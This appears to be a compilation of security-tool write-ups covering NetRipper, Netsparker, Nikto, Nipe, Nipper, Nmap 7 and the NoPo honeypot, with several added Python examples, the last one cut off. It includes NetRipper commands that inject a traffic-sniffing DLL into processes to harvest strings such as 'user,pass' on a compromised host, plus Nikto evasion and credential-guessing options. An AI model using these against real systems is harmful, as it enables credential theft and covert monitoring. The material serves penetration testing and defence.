The post-exploitation activities in a penetration test can be challenging if the tester has low privileges on a fully patched, well configured Windows machine. This work presents a technique for helping the tester find useful information by sniffing the network traffic of the applications on the compromised machine, despite his low-privileged rights. Furthermore, the encrypted traffic is also captured before being sent to the encryption layer, thus all traffic (clear-text and encrypted) can be sniffed. The implementation of this technique is a tool called NetRipper which uses API hooking to do the actions mentioned above and which has been especially designed to be used in penetration tests, but the concept can also be used to monitor the network traffic of employees or to analyze a malicious application.
Tested applications

NetRipper should be able to capture network traffic from: Putty, WinSCP, SQL Server Management Studio, Lync (Skype for Business), Microsoft Outlook, Google Chrome, Mozilla Firefox. The list is not limited to these applications, but other tools may require special support.
Components
NetRipper.exe - Configures and injects the DLL
DLL.dll       - Injected DLL, hooks APIs and saves data to files
netripper.rb  - Metasploit post-exploitation module

Command line
Injection: NetRipper.exe DLLpath.dll processname.exe
Example: NetRipper.exe DLL.dll firefox.exe

Generate DLL:
-h, --help          Print this help message
-w, --write         Full path for the DLL to write the configuration data
-l, --location      Full path where to save data files (default TEMP)
Plugins:
-p, --plaintext     Capture only plain-text data. E.g. true
-d, --datalimit     Limit capture size per request. E.g. 4096
-s, --stringfinder  Find specific strings. E.g. user,pass,config
Example: NetRipper.exe -w DLL.dll -l TEMP -p true -d 4096 -s user,pass

Metasploit module
msf > use post/windows/gather/netripper
msf post(netripper) > show options
Module options (post/windows/gather/netripper):
   Name          Current Setting                  Required  Description
   ----          ---------------                  --------  -----------
   DATALIMIT     4096                             no        The number of bytes to save from requests/responses
   DATAPATH      TEMP                             no        Where to save files. E.g. C:\Windows\Temp or TEMP
   PLAINTEXT     true                             no        True to save only plain-text data
   PROCESSIDS                                     no        Process IDs. E.g. 1244,1256
   PROCESSNAMES                                   no        Process names. E.g. firefox.exe,chrome.exe
   SESSION                                        yes       The session to run this module on.
   STRINGFINDER  user,login,pass,database,config  no        Search for specific strings in captured data
Set PROCESSNAMES and run.

Metasploit installation (Kali)
1. cp netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper.rb
2. mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper
3. g++ -Wall netripper.cpp -o netripper
4. cp netripper /usr/share/metasploit-framework/modules/post/windows/gather/netripper/netripper
5. cd ../Release
6. cp DLL.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.dll
PowerShell module
@HarmJ0y added Invoke-NetRipper.ps1, a PowerShell implementation of NetRipper.exe

Plugins
1. PlainText - Allows to capture only plain-text data
2. DataLimit - Save only the first bytes of requests and responses
3. StringFinder - Find specific strings in network traffic

Download NetRipper
NETSPARKER 4 - EASIER TO USE, MORE AUTOMATION
AND MUCH MORE WEB SECURITY CHECKS

Netsparker Web Application Security Scanner version 4. The main highlight of this new version is the new fully automated Form Authentication mechanism; it does not require you to record anything, and it supports two-factor authentication and other authentication mechanisms that require a one-time code, out of the box.
Below is a list of feature highlights of the new Netsparker Web Application Security Scanner version 4.
Configuring New Web Application Security Scans Just Got Easier

This is the first thing you will notice when you launch the new version of Netsparker Desktop: a more straightforward and easier to use New Scan dialog. Easy to use software has become synonymous with Netsparker's scanners, and in this version we raised the bar again, giving many users the opportunity to launch web security scans even if they are not that familiar with web application security.

As seen in the above screenshot, all the generic scan settings you need are ergonomically placed in the right position, allowing you to quickly configure a new web application security scan. All of the advanced scan settings, such as HTTP connection options, have been moved to scan policies.
Revamped Form Authentication Support to Scan Password Protected Areas

The new fully automated form authentication mechanism of Netsparker Desktop emulates a real user login, therefore even if tokens or other one-time parameters are used by the web application, an out of the box installation of the scanner can still log in to the password protected area and scan it. For example, in the example below Netsparker is being used to log in to the MailChimp website.

Once you enter the necessary details, mainly the login form URL and credentials, you can click Verify Login & Logout to verify that the scanner can automatically log in and identify a logged-in session, as shown in the screenshot below.

You do not have to record any login macros because the new mechanism is all based on the DOM. You just have to enter the login form URL, username and password and it will automatically log in to the password protected section. We have tested the new automated form authentication mechanism on more than 300 live websites and can confirm that, using an out of the box setup, it works on 85% of the websites. 13% of the remaining edge cases can be fixed by writing 2-5 lines of JavaScript code with Netsparker's new JavaScript custom script support. Pretty neat, don't you think? Below are just a few of the login forms we tested.

The new Form Authentication mechanism also supports custom scripts which can be used to override the scanner's behaviour, or in rare cases where the automated login button detection is not working. The custom scripting language has been changed to JavaScript because it is easier and many more users are familiar with it.

Out of the Box Support for Two-Factor Authentication and One Time Passwords

The new Form Authentication mechanism of Netsparker Desktop can also be used to automatically scan websites which use two-factor authentication or any other type of one-time password technology. It is very simple to configure: specify the login form URL, username and password and tick the option Interactive Login, so that a browser window automatically prompts you to enter the third authentication factor during a web application security scan.

Ability to Emulate Different User Roles During a Scan

To ensure that all possible vulnerabilities in a password protected area are identified, you should scan it using different users that have different roles and privileges. With the new form authentication mechanism of Netsparker you can do just that! When configuring the authentication details, specify multiple usernames and passwords, so in between scans you just have to select which credentials should be used, without the need to record any new login macros or reconfigure the scanner.

Automatically Identify Vulnerabilities in Google Web Toolkit Applications

Google Web Toolkit, also known as GWT, is an open source framework that gained a lot of popularity. Nowadays many web applications are being built on it, or use features and functions from it. Since web applications built with GWT heavily depend on complex JavaScript, we built a dedicated engine in Netsparker to support GWT.
This means that you can use Netsparker Desktop to automatically crawl, scan and identify vulnerabilities and security flaws in Google Web Toolkit applications.
Identify Vulnerabilities in File Upload Forms

Like with every version or build of Netsparker we release, we included a number of new security checks in this version. Though one specific web application security check that is included in this version needs more attention than the others: file upload form vulnerabilities.
From this version onwards Netsparker Desktop will check all the file upload forms on your websites for the vulnerabilities such forms are typically susceptible to; for example, Netsparker tests that all the validation checks in a file upload form work and that they cannot be bypassed by malicious attackers.

Mixed Content Type, Cross-Frame Options, CORS configuration

We also added various new web security checks, mostly around HTML5 security headers. For example, Netsparker now checks for X-Frame-Options usage, and for possible problems in its implementation which can lead to Clickjacking vulnerabilities and some other security issues.
Another new check examines the configuration of CORS headers. Finally, in this category we added Mixed Content Type checks for HTTPS pages and Content-Type header analysis for all of the pages.
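A passive version of the header checks described in this section, added as an example and not Netsparker's code. It inspects one HTTP response at a time: X-Frame-Options presence and value, the CORS headers (a wildcard paired with credentials, the null origin, or reflection of a probe origin the scanner sent), a Content-Type without charset, and active mixed content on an HTTPS page. The responses it checks are constructed samples, and the probe-origin convention and finding texts are this example's own, not Netsparker's.

```python
"""Added example, not Netsparker's code: passive checks over a single HTTP
response for the header issues the text lists. It flags a missing or
unsupported X-Frame-Options value, a CORS policy that reflects an untrusted
probe origin or pairs a wildcard with credentials, a Content-Type without
charset, and active mixed content on an HTTPS page."""
import re

# Tags whose http:// sources on an HTTPS page are active mixed content.
MIXED_CONTENT_RE = re.compile(
    r"<(?:script|link|iframe|object|embed)\b[^>]*?\s(?:src|href)=[\"']http://([^\"'/]+)",
    re.IGNORECASE)


def check_response(headers, body="", is_https=True, probe_origin=None):
    """Return a list of finding strings for one response.

    probe_origin is an origin the scanner made up for its request; if the
    server echoes it in Access-Control-Allow-Origin, the policy reflects
    arbitrary origins instead of an allowlist."""
    h = {k.lower(): v.strip() for k, v in headers.items()}
    findings = []

    xfo = h.get("x-frame-options")
    if xfo is None:
        findings.append("X-Frame-Options missing: page can be framed (clickjacking)")
    elif xfo.upper() not in ("DENY", "SAMEORIGIN"):
        # ALLOW-FROM and typos are not honoured consistently by browsers
        findings.append("X-Frame-Options value %r is not DENY/SAMEORIGIN" % xfo)

    acao = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").lower() == "true"
    if acao == "*" and creds:
        findings.append("CORS: wildcard origin combined with credentials")
    elif acao == "null":
        findings.append("CORS: the 'null' origin is allowed")
    elif probe_origin and acao == probe_origin:
        findings.append("CORS: untrusted origin %s reflected%s"
                        % (probe_origin, " with credentials" if creds else ""))

    ctype = h.get("content-type")
    if ctype is None:
        findings.append("Content-Type missing: browser may sniff the type")
    elif ctype.lower().startswith("text/html") and "charset=" not in ctype.lower():
        findings.append("Content-Type for HTML lacks a charset")

    if is_https:
        for host in MIXED_CONTENT_RE.findall(body):
            findings.append("mixed content: active resource loaded over http from %s" % host)
    return findings


# Constructed sample responses: a weak one and its corrected form.
WEAK_HEADERS = {
    "Content-Type": "text/html",
    "Access-Control-Allow-Origin": "https://probe.example",
    "Access-Control-Allow-Credentials": "true",
}
WEAK_BODY = '<html><head><script src="http://cdn.example/app.js"></script></head></html>'

HARDENED_HEADERS = {
    "Content-Type": "text/html; charset=utf-8",
    "X-Frame-Options": "DENY",
    "Access-Control-Allow-Origin": "https://app.example",
    "Access-Control-Allow-Credentials": "true",
}
HARDENED_BODY = '<html><head><script src="https://cdn.example/app.js"></script></head></html>'

if __name__ == "__main__":
    for finding in check_response(WEAK_HEADERS, WEAK_BODY, probe_origin="https://probe.example"):
        print("weak:", finding)
    print("hardened:", check_response(HARDENED_HEADERS, HARDENED_BODY,
                                      probe_origin="https://probe.example"))
```

The hardened response passes because its allowlist names a fixed origin rather than echoing the request's, carries a charset, forbids framing and loads its script over HTTPS; a single response can only show reflection if the request carried a probe origin, which is why the caller passes it in.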
XML External Entity (XXE) Engine

Applications that deal with XML data are particularly susceptible to XML External Entity (XXE) attacks. A successful exploitation of an XXE vulnerability allows an attacker to launch other, more grievous attacks, such as code execution. Since this version, Netsparker automatically checks websites and web applications for XXE vulnerabilities.

Insecure JSONP Endpoints - Rosetta Flash & Reflected File Download Attacks

In this version we added a new security check to identify insecure JSONP endpoints and other controllable endpoints that can lead to Rosetta Flash or Reflected File Download attacks.
Even if your application is not using JSONP, you can still be vulnerable to these types of attacks in other forms, hence why it is always important to scan your website with Netsparker.

Other Netsparker Desktop 4 Features and Product Improvements

The above list just highlights the most prominent features and new security checks of Netsparker Desktop version 4, the only false positive free web application security scanner. Included in this version there are also more new security checks, and we also improved several existing security checks, hence the scanner's coverage is better than ever before. Of course we also included a number of product improvements.
Since there have been a good number of improvements and changes in this version, there are also some things from older versions of Netsparker which are no longer supported, such as scan profiles. Because we changed the way Netsparker saves scan profiles, scan profiles generated with older versions of Netsparker will no longer work. Therefore I recommend you check the Netsparker Desktop version 4 changelog for more information on what is new, changed and improved.

NETSPARKER CLOUD - ONLINE WEB APPLICATION


SECURITY SCANNER

Netsparker Cloud is an online web application security scanner


built around the advanced scanning technology of Netsparker
Web Application Security Scanner; the only false positive free
automated desktop based web vulnerability scanner.
Benefit from the Cloud

AFFORDABLE AND MAINTENANCE FREE WEB


APPLICATION SECURITY SOLUTION
Embrace the benefits of the cloud! With Netsparker Cloud you
do not need to buy, license, install and support any hardware or
software. Simply pay a yearly fee and launch as many web
application security scans as you want from anywhere using
the web based portal.
SCALABLE AND ALWAYS AVAILABLE: SCAN AS MANY
WEBSITES AS YOU WANT WHEN YOU WANT

Netsparker Cloud enables you to launch as many web
application security and vulnerability scans as you want within
just minutes, thus allowing you to boost your productivity and
easily stay a step ahead of malicious attackers.
A new vulnerability such as Heartbleed or Shellshock is being
exploited in the wild and you need to scan 500 or 1,000 web
applications in just a few hours? You have new web
applications that you need to add to your extensive scanning
program? No need to set up any additional hardware or
software or call in an emergency team; just log in to the
Netsparker Cloud web portal and launch the web security scans.
Other Netsparker Cloud Features Organizations Can Benefit From:

FULLY CONFIGURABLE ONLINE WEB VULNERABILITY SCANNER
Netsparker Cloud is fully configurable, just like the desktop
version of Netsparker. You can configure every single detail of
the web application security scan, including scan policies, attack
options, HTTP options, URL rewrite rules, authentication
options and everything else.
EASILY INTEGRATE WEB SECURITY SCANNING IN YOUR SDLC
Netsparker Cloud has a web service based API that allows you
to remotely trigger new web security scans and much more
from anywhere at any time. This API enables organizations to
easily integrate web application security scans into their
development environment so they can launch security scans
throughout every stage of the software development lifecycle.

TEAM AND ENTERPRISE LEVEL COLLABORATION MADE EASY
You can add multiple users with different privileges to the same
Netsparker Cloud account, thus allowing everyone in the
organization to easily collaborate and share all the findings to
streamline the process of securing web applications.
CORRELATED TRENDING REPORTS HELP YOU KEEP
TRACK OF WEB APPLICATION PROJECTS
Web applications are constantly evolving; new features,
functionality and improvements are the order of the day to
ensure they continuously meet all business requirements.
However, such changes also open up new security issues.
The Netsparker Cloud security dashboard allows you to easily
keep an eye on the state of security of all web applications, while
the trending reports will help you keep track of the quality of work
your developers are doing. Trending reports can also help you
monitor who is improving so you can better assign tasks
according to each developer's skills.

Try Netsparker Cloud


NIKTO2 - WEB SERVER SCANNER

Nikto is an Open Source (GPL) web server scanner which
performs comprehensive tests against web servers for multiple
items, including over 6700 potentially dangerous files/
programs, checks for outdated versions of over 1250 servers,
and version specific problems on over 270 servers. It also
checks for server configuration items such as the presence of
multiple index files, HTTP server options, and will attempt to
identify installed web servers and software. Scan items and
plugins are frequently updated and can be automatically
updated.
Nikto is not designed as a stealthy tool. It will test a web server
in the quickest time possible, and is obvious in log files or to an
IPS/IDS. However, there is support for LibWhisker's anti-IDS
methods in case you want to give it a try (or test your IDS
system).
Not every check is a security problem, though most are. There
are some items that are "info only" type checks that look for
things that may not have a security flaw, but the webmaster or
security engineer may not know are present on the server.

These items are usually marked appropriately in the information


printed. There are also some checks for unknown items which
have been seen scanned for in log files.
Features

Here are some of the major features of Nikto. See the


documentation for a full list of features and how to use them.
SSL Support (Unix with OpenSSL or maybe Windows with
ActiveState's Perl/NetSSL)
Full HTTP proxy support
Checks for outdated server components
Save reports in plain text, XML, HTML, NBE or CSV
Template engine to easily customize reports
Scan multiple ports on a server, or multiple servers via
input file (including nmap output)
LibWhisker's IDS encoding techniques
Easily updated via command line
Identifies installed software via headers, favicons and files
Host authentication with Basic and NTLM
Subdomain guessing
Apache and cgiwrap username enumeration
Mutation techniques to "fish" for content on web servers
Scan tuning to include or exclude entire classes of
vulnerability checks
Guess credentials for authorization realms (including
many default id/pw combos)
Authorization guessing handles any directory, not just the
root directory
Enhanced false positive reduction via multiple methods:
headers, page content, and content hashing
Reports "unusual" headers seen
Interactive status, pause and changes to verbosity
settings
Save full request/response for positive tests
Replay saved positive requests
Maximum execution time per target
Auto-pause at a specified time
Checks for common "parking" sites
Logging to Metasploit
Thorough documentation

Basic usage
Options:
  -ask+            Whether to ask about submitting updates
                     yes    Ask about each (default)
                     no     Don't ask, don't send
                     auto   Don't ask, just send
  -Cgidirs+        Scan these CGI dirs: "none", "all", or values like "/cgi/ /cgi-a/"
  -config+         Use this config file
  -Display+        Turn on/off display outputs:
                     1      Show redirects
                     2      Show cookies received
                     3      Show all 200/OK responses
                     4      Show URLs which require authentication
                     D      Debug output
                     E      Display all HTTP errors
                     P      Print progress to STDOUT
                     S      Scrub output of IPs and hostnames
                     V      Verbose output
  -dbcheck         Check database and other key files for syntax errors
  -evasion+        Encoding technique:
                     1      Random URI encoding (non-UTF8)
                     2      Directory self-reference (/./)
                     3      Premature URL ending
                     4      Prepend long random string
                     5      Fake parameter
                     6      TAB as request spacer
                     7      Change the case of the URL
                     8      Use Windows directory separator (\)
                     A      Use a carriage return (0x0d) as a request spacer
                     B      Use binary value 0x0b as a request spacer
  -Format+         Save file (-o) format:
                     csv    Comma-separated-value
                     htm    HTML Format
                     msf+   Log to Metasploit
                     nbe    Nessus NBE format
                     txt    Plain text
                     xml    XML Format
                   (if not specified the format will be taken from the file
                   extension passed to -output)
  -Help            Extended help information
  -host+           Target host
  -IgnoreCode      Ignore Codes--treat as negative responses
  -id+             Host authentication to use, format is id:pass or id:pass:realm
  -key+            Client certificate key file
  -list-plugins    List all available plugins, perform no testing
  -maxtime+        Maximum testing time per host
  -mutate+         Guess additional file names:
                     1      Test all files with all root directories
                     2      Guess for password file names
                     3      Enumerate user names via Apache (/~user type requests)
                     4      Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests)
                     5      Attempt to brute force sub-domain names, assume that
                            the host name is the parent domain
                     6      Attempt to guess directory names from the supplied
                            dictionary file
  -mutate-options  Provide information for mutates
  -nointeractive   Disables interactive features
  -nolookup        Disables DNS lookups
  -nossl           Disables the use of SSL
  -no404           Disables nikto attempting to guess a 404 page
  -output+         Write output to this file ('.' for auto-name)
  -Pause+          Pause between tests (seconds, integer or float)
  -Plugins+        List of plugins to run (default: ALL)
  -port+           Port to use (default 80)
  -RSAcert+        Client certificate file
  -root+           Prepend root value to all requests, format is /directory
  -Save            Save positive responses to this directory ('.' for auto-name)
  -ssl             Force ssl mode on port
  -Tuning+         Scan tuning:
                     1      Interesting File / Seen in logs
                     2      Misconfiguration / Default File
                     3      Information Disclosure
                     4      Injection (XSS/Script/HTML)
                     5      Remote File Retrieval - Inside Web Root
                     6      Denial of Service
                     7      Remote File Retrieval - Server Wide
                     8      Command Execution / Remote Shell
                     9      SQL Injection
                     0      File Upload
                     a      Authentication Bypass
                     b      Software Identification
                     c      Remote Source Inclusion
                     x      Reverse Tuning Options (i.e., include all except specified)
  -timeout+        Timeout for requests (default 10 seconds)
  -Userdbs         Load only user databases, not the standard databases
                     all    Disable standard dbs and load only user dbs
                     tests  Disable only db_tests and load udb_tests
  -until           Run until the specified time or duration
  -update          Update databases and plugins from CIRT.net
  -useproxy        Use the proxy defined in nikto.conf
  -Version         Print plugin and database versions
  -vhost+          Virtual host (for Host header)
    + requires a value

Basic Testing

The most basic Nikto scan requires simply a host to target,
since port 80 is assumed if none is specified. The host can
either be an IP or a hostname of a machine, and is specified
using the -h (-host) option. This will scan the IP 192.168.0.1
on TCP port 80:
perl nikto.pl -h 192.168.0.1

To check on a different port, specify the port number with the
-p (-port) option. This will scan the IP 192.168.0.1 on TCP port
443:
perl nikto.pl -h 192.168.0.1 -p 443

Hosts, ports and protocols may also be specified by using a full
URL syntax, and it will be scanned:
perl nikto.pl -h https://192.168.0.1:443/

There is no need to specify that port 443 may be SSL, as Nikto
will first test regular HTTP and if that fails, HTTPS. If you are
sure it is an SSL server, specifying -s (-ssl) will speed up the
test:
perl nikto.pl -h 192.168.0.1 -p 443 -ssl

More complex tests can be performed using the -mutate
parameter. This can produce extra tests, some of which may be
provided with extra parameters through the -mutate-options
parameter. For example, using -mutate 3, with or without a file,
attempts to brute force usernames if the web server allows
~user URIs:
perl nikto.pl -h 192.168.0.1 -mutate 3 -mutate-options user-list.txt

Multiple Port Testing

Nikto can scan multiple ports in the same scanning session. To
test more than one port on the same host, specify the list of
ports in the -p (-port) option. Ports can be specified as a
range (e.g., 80-90), or as a comma-delimited list (e.g.,
80,88,90). This will scan the host on ports 80, 88 and 443:
perl nikto.pl -h 192.168.0.1 -p 80,88,443
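In practice the port list comes from a preceding nmap sweep rather than being typed by hand. The following is an added example (not Nikto or Nmap project code) that turns nmap greppable output (nmap -oG) into one Nikto invocation per host and transport, grouping the plain-HTTP ports into a single -p list and putting TLS ports into a separate run with -ssl, so Nikto does not spend time probing HTTP first. It also passes -vhost when nmap resolved a hostname. The -oG layout it parses ("Host: <ip> (<name>)<TAB>Ports: <port>/<state>/<proto>/<owner>/<service>/...") is the documented greppable format; the sample scan text, the host addresses and the set of service names treated as "web" are constructed for the example.

```python
"""Build per-host Nikto command lines from nmap -oG output (added example)."""
import re
import shlex

# Constructed sample of "nmap -oG -" output; not captured from a real network.
SAMPLE_GNMAP = (
    "# Nmap 7.01 scan initiated (constructed sample)\n"
    "Host: 192.168.0.1 ()\tStatus: Up\n"
    "Host: 192.168.0.1 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, "
    "443/open/tcp//ssl|https///\tIgnored State: closed (997)\n"
    "Host: 192.168.0.2 (web2.lab)\tPorts: 8080/open/tcp//http-proxy///, "
    "8443/open/tcp//ssl|https-alt///, 3306/filtered/tcp//mysql///\n"
    "Host: 192.168.0.3 ()\tPorts: 25/open/tcp//smtp///\n"
)

# nmap service names we hand to Nikto (assumption: tune to your environment)
WEB_SERVICES = {"http", "https", "http-proxy", "http-alt", "https-alt"}
HOST_RE = re.compile(r"^Host: (\S+) \(([^)]*)\)")


def parse_gnmap(text):
    """Yield (ip, hostname, port, service) for every open TCP port."""
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue                      # comments and trailer lines
        ip, hostname = m.group(1), m.group(2)
        ports_field = next((f for f in line.split("\t") if f.startswith("Ports: ")), None)
        if ports_field is None:
            continue                      # "Status: Up" lines carry no ports
        for entry in ports_field[len("Ports: "):].split(","):
            fields = entry.strip().split("/")
            if len(fields) < 5:
                continue
            port, state, proto, service = fields[0], fields[1], fields[2], fields[4]
            if state == "open" and proto == "tcp":
                yield ip, hostname, int(port), service


def web_targets(text):
    """Group open web ports per host into 'http' and 'https' sets."""
    targets = {}
    for ip, hostname, port, service in parse_gnmap(text):
        name = service.split("|")[-1]     # "ssl|https" -> "https"
        if name not in WEB_SERVICES:
            continue
        scheme = "https" if service.startswith("ssl|") or "https" in name else "http"
        entry = targets.setdefault(ip, {"hostname": hostname, "http": set(), "https": set()})
        entry[scheme].add(port)
    return targets


def nikto_commands(text):
    """One Nikto argv per host and scheme; TLS ports get -ssl to skip HTTP probing."""
    cmds = []
    for ip, entry in sorted(web_targets(text).items()):
        for scheme in ("http", "https"):
            ports = sorted(entry[scheme])
            if not ports:
                continue
            cmd = ["nikto", "-h", ip, "-p", ",".join(str(p) for p in ports)]
            if scheme == "https":
                cmd.append("-ssl")
            if entry["hostname"]:
                cmd += ["-vhost", entry["hostname"]]
            cmd += ["-Format", "xml", "-output", f"nikto_{ip}_{scheme}.xml"]
            cmds.append(cmd)
    return cmds


def shell_lines(text):
    """Shell-quoted form of nikto_commands(), ready for a job runner or xargs."""
    return [" ".join(shlex.quote(a) for a in cmd) for cmd in nikto_commands(text)]


if __name__ == "__main__":
    print("\n".join(shell_lines(SAMPLE_GNMAP)))
```

Hosts with no web service (192.168.0.3 above) produce no command, and a filtered port is skipped even when its service name looks interesting, so the generated jobs only ever touch ports nmap actually saw open.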

DownloadNikto2
NIPE - SCRIPT TO REDIRECT ALL TRAFFIC FROM THE
MACHINE TO THE TOR NETWORK

Script to redirect all the traffic from the machine to the Tor
network.
[+] AUTHOR:   Vinicius Gouvea
[+] EMAIL:    vini@inploit.com
[+] BLOG:     https://medium.com/viniciusgouvea
[+] GITHUB:   https://github.com/HeitorG
[+] FACEBOOK: https://fb.com/viniciushgouvea

Installing:

git clone https://github.com/HeitorG/nipe
cd nipe
cpan install strict warnings Switch

Commands:
COMMAND   FUNCTION
install   For install.
start     To start
stop      To stop

Tested on:
Ubuntu 14.10 and 15.04
BunsenLabs Hydrogen
Debian Jessie 8.1 and Wheezy 7.9
Lubuntu 15.04
Xubuntu 15.04
LionSec 3.0

Download Nipe
NIPPER - TOOLKIT WEB SCAN FOR ANDROID

The first web vulnerability scanner for the Android environment
(an iOS version is in development). This vulnerability scanner
focuses on the most widely used CMSs (WordPress, Drupal,
Joomla, Blogger).
In its first version Nipper has 10 different modules for
gathering information about a specific URL.
Its interface is designed so that with just a few taps you can
extract most of a site's information.
Available modules:

IP Server
CMS Detect & Version
DNS Lookup
Nmap ports IP SERVER
Enumeration Users
Enumeration Plugins
Find Exploit Core CMS
Find Exploit DB
CloudFlare Resolver
Nipper does NOT require root; it only requires Internet
permission.
Compatible from Android 2.3 to Android L.

DownloadNipper
NMAP 7 - SECURITY SCANNER FOR NETWORK
EXPLORATION & SECURITY AUDITS

Nmap (Network Mapper) is a free and open source (license)
utility for network discovery and security auditing. Many
systems and network administrators also find it useful for
network inventory, managing service upgrade schedules,
monitoring host or service uptime, and many other tasks. Nmap
uses raw IP packets in novel ways to determine what hosts are
available on the network, what services (application name and
version) those hosts are offering, what operating systems (and
OS versions) they are running, what type of packet filters/
firewalls are in use, and dozens of other characteristics. It was
designed to rapidly scan large networks, but works fine against
single hosts. Nmap runs on all major computer operating
systems, and official binary packages are available for Linux,
Windows, and Mac OS X. In addition to the classic command-line
Nmap executable, the Nmap suite includes an advanced
GUI and results viewer (Zenmap), a flexible data transfer,
redirection, and debugging tool (Ncat), a utility for comparing
scan results (Ndiff), and a packet generation and response
analysis tool (Nping).
Nmap was named Security Product of the Year by Linux
Journal, InfoWorld, LinuxQuestions.Org, and Codetalker
Digest. It was even featured in nineteen movies and TV series,
including The Matrix Reloaded, The Bourne Ultimatum, Girl
with the Dragon Tattoo, Dredd, Elysium, and Die Hard 4. Nmap
was released to the public in 1997 and has earned the trust of
millions of users.
Top 7 Improvements in Nmap 7

Before we get into the detailed changes, here are the top 7
improvements in Nmap 7:
1. Major Nmap Scripting Engine (NSE) Expansion
As the Nmap core has matured, more and more new
functionality is developed as part of our NSE subsystem
instead. In fact, we've added 171 new scripts and 20 libraries
since Nmap 6. Examples include firewall-bypass,
supermicro-ipmi-conf, oracle-brute-stealth, and ssl-heartbleed.
And NSE is now powerful enough that scripts can take on core
functions such as host discovery (dns-ip6-arpa-scan), version
scanning (ike-version, snmp-info, etc.), and RPC grinding
(rpc-grind). There's even a proposal to implement port scanning
in NSE. [More Details]
2. Mature IPv6 support
IPv6 scanning improvements were a big item in the Nmap 6
release, but Nmap 7 outdoes them all with full IPv6 support for
CIDR-style address ranges, Idle Scan, parallel reverse-DNS,
and more NSE script coverage. [More Details]
3. Infrastructure Upgrades
We may be an 18-year-old project, but that doesn't mean we'll
stick with old, crumbling infrastructure! The Nmap Project
continues to adopt the latest technologies to enhance the
development process and serve a growing user base. For
example, we converted all of Nmap.Org to SSL to reduce the
risk of trojan binaries and reduce snooping in general. We've
also been using the Git version control system as a larger part
of our workflow and have an official Github mirror of the Nmap
Subversion source repository and we encourage code
submissions to be made as Github pull requests. We also
created an official bug tracker which is also hosted on Github.
Tracking bugs and enhancement requests this way has already
reduced the number which fall through the cracks. [More
Details]
4. Faster Scans
Nmap has continually pushed the speed boundaries of
synchronous network scanning for 18 years, and this release is
no exception. New Nsock engines give a performance boost to
Windows and BSD systems, target reordering prevents a nasty
edge case on multihomed systems, and NSE tweaks lead to
much faster -sV scans. [More Details]
5. SSL/TLS scanning solution of choice
Transport Layer Security (TLS) and its predecessor, SSL, are
the security underpinning of the web, so when big
vulnerabilities like Heartbleed, POODLE, and FREAK come
calling, Nmap answers with vulnerability detection NSE scripts.
The ssl-enum-ciphers script has been entirely revamped to
perform fast analysis of TLS deployment problems, and version
scanning probes have been tweaked to quickly detect the
newest TLS handshake versions. [More Details]
6. Ncat Enhanced
We are excited and proud to announce that Ncat has been
adopted by the Red Hat/Fedora family of distributions as the
default package to provide the "netcat" and "nc" commands!
This cooperation has resulted in a lot of squashed bugs and
enhanced compatibility with Netcat's options. Also very exciting
is the addition of an embedded Lua interpreter for creating
simple, cross-platform daemons and traffic filters.
7. Extreme Portability
Nmap is proudly cross-platform and runs on all sorts of esoteric
and archaic systems. But our binary distributions have to be
kept up-to-date with the latest popular operating systems.
Nmap 7 runs cleanly on Windows 10 all the way back to
Windows Vista. By popular request, we even built it to run on
Windows XP, though we suggest those users upgrade their
systems. Mac OS X is supported from 10.8 Mountain Lion
through 10.11 El Capitan. Plus, we updated support for Solaris
and AIX. And Linux users, you have it easy.

Download Nmap 7
NOPO - NOSQL HONEYPOT FRAMEWORK

NoSQL-Honeypot-Framework (NoPo) is an open source
honeypot for NoSQL databases that automates the process of
detecting attackers and logging attack incidents. The simulation
engines are deployed using the Twisted framework. Currently
the framework supports Redis.
N.B.: The framework is under development and is prone to
bugs.
Installation

You can download NoPo by cloning the Git repository:

git clone https://github.com/torque59/nosqlpot.git
pip install -r requirements.txt

NoPo works out of the box with Python version 2.6.x and 2.7.x
on any platform.
Added Features:

First Ever Honeypot for NoSQL Databases
Support For Config Files
Simulates Protocol Specification as of Servers
Support for Redis

Usage

Get a list of basic options:
python nopo.py -h

Deploy a NoSQL engine:
python nopo.py -deploy redis

Deploy a NoSQL engine with a configuration file:
python nopo.py -deploy redis -config filename

Log commands and session to file:
python nopo.py -deploy redis -out log.out
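The core of a Redis honeypot such as the one NoPo deploys is a simulation engine that speaks enough of the Redis wire protocol (RESP) to keep an attacker's client talking while every command is recorded. The block below is an added example of that engine, written for this page and not taken from NoPo: it reassembles RESP arrays across TCP chunks, also accepts the bare inline commands an attacker types over netcat, answers with canned replies, and logs each command with a timestamp and peer address. It runs without Twisted (a real deployment would feed HoneypotSession.feed from a protocol's dataReceived). The fake INFO banner and the peer addresses are constructed for the example.

```python
"""Minimal RESP (Redis protocol) parser, canned responder and session log
for a NoSQL honeypot (added example, not NoPo project code)."""
from datetime import datetime, timezone

CRLF = b"\r\n"

# Constructed banner; a deployment tunes this to resemble the version it impersonates.
FAKE_INFO = b"# Server\r\nredis_version:2.8.4\r\nos:Linux 3.13.0 x86_64\r\ntcp_port:6379\r\n"


def parse_resp(buf: bytes):
    """Parse one client request from the front of buf.

    Returns (argv, rest): argv is the command as a list of str and rest the
    unconsumed bytes, or (None, buf) when the request is not complete yet.
    Handles RESP arrays ("*2\\r\\n$3\\r\\nGET\\r\\n$1\\r\\nk\\r\\n", what redis-cli
    and libraries send) and inline commands ("PING\\r\\n", what attackers type
    over telnet or nc). Raises ValueError on a malformed frame.
    """
    if not buf:
        return None, buf
    if buf[:1] != b"*":                       # inline command
        end = buf.find(CRLF)
        if end < 0:
            return None, buf
        return buf[:end].decode("latin-1").split(), buf[end + 2:]
    end = buf.find(CRLF)
    if end < 0:
        return None, buf
    count = int(buf[1:end])                   # "*<n>" array header
    pos = end + 2
    argv = []
    for _ in range(count):
        if buf[pos:pos + 1] != b"$":
            if pos >= len(buf):
                return None, buf              # header arrived, bulk strings not yet
            raise ValueError("expected bulk string at offset %d" % pos)
        end = buf.find(CRLF, pos)
        if end < 0:
            return None, buf
        length = int(buf[pos + 1:end])        # "$<len>" bulk string header
        start = end + 2
        if len(buf) < start + length + 2:
            return None, buf                  # payload still in flight
        argv.append(buf[start:start + length].decode("utf-8", "replace"))
        pos = start + length + 2
    return argv, buf[pos:]


def respond(argv):
    """Canned replies that keep the client engaged; nothing is ever stored."""
    if not argv:
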